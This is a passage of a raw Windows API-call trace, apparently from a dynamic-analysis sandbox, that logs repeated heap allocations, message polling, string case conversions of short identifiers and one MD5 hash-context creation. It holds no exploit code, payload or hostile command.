lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.309] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.309] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.309] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.309] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.309] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.310] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0209.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.310] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0209.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.311] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.311] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0209.312] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.312] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.312] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.312] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.313] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.313] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.314] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.315] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.315] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.316] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.316] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.316] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.316] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.316] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.317] CryptCreateHash (in: hProv=0xad27a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0209.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.318] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0209.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.319] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 